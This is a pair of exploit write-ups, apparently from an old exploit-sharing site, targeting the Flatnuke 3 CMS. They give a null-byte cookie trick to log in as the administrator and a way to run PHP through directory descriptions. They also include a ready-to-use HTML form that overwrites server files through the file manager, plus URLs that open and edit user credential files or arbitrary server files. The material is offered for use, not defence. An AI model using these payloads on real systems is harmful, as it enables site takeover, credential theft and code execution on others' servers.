flatnuke3-fm.txt
Posted on 23 October 2007
--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ _____/ |_ /_ |/ |_ | |/ | | _(__ <_/ ___ __ ______ | __\n| | | | |/ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| /\______| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Flatnuke3 Remote Cookie Manipoulation / Privilege Escalation --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC: When an user log in, flatnuke set him a cookie value like this: myforum=nomeuser. If we try to change it, flatnuke will ask us to log in again. The code is: $req = $_SERVER["REQUEST_URI"]; if (strstr($req, "myforum=")) die(_NONPUOI); So, we can bypass this filter, using nullbyte and login as admin. For example, Replace: myforum=yourusername with: myforum%00=adminusername PHP Execution PoC: I saw that in download module, if we set to "1" the fneditmode, we can make directory. So, we can write a description for the directory, and this description will be saved in /Download/[Dir_Name]/description.it.php . Yes, we can insert php code in the description and it will be execute! Nice, dontcha? : P --------------------------------------------------------------- Original here: http://www.inj3ct-it.org/exploit/flatnuke3-cm.txt --------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ _____/ |_ /_ |/ |_ | |/ | | _(__ <_/ ___ __ ______ | __\n| | | | |/ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| /\______| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Flatnuke 3 Remote Command Execution / Privilege Escalation --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- Corrupted Module: File Manager --------------------------------------------------------------- PoC: Flatnuke doesn't use any database, so the registred users informations are located in a php file like /flatnuke3/misc/fndatabase/users/username.php . By the file manager module, the administrator, can upload, make, edit or delete some files, only while he's logging in. By the way, making a post whit the same request of that module, we can replace or edit a file, for example an user profile. So, there are a lot of way to exploit this vulnerability, we can edit the admin credentials, we can upload a malicious php script, and much more... But to exploit this vulnerability, we need to know the script path. We can get it generating a full path disclosure. --------------------------------------------------------------- Full Path Disclosure Example: http://[target]/[flatnuke3_path]/index.php?mod=[forum_path] &op=disc&argumentname=[a_casual_char] --------------------------------------------------------------- File Replace Exploit: <form method="post" action="http://[target]/[flatnuke3_path]/index.php? mod=none_filemanager&op="><textarea id="body" name="body" cols="90" rows=" 35"> </textarea><br><input value="Save" type="submit"><input type="reset"> <input name="opmod" value="save" type="hidden"> <input name="ffile" value="[file_name].php" type="hidden"> <input name="dir" value="/[script_path]/[file_path]" type="hidden"><input class="button" onclick="history.back()" value="Annulla" type="button"></form> --------------------------------------------------------------- User Credential View/Edit Exploit: http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/ [script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username]. php&opmod=open&op= Or, for example u can view and edit a file located on the server: http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/ [script_path]/&ffile=[file]&opmod=open&op= --------------------------------------------------------------- Do you wanna another way to exploit this vuln? Use your brain! :P --------------------------------------------------------------- Original here: http://www.inj3ct-it.org/exploit/flatnuke3-fm.txt
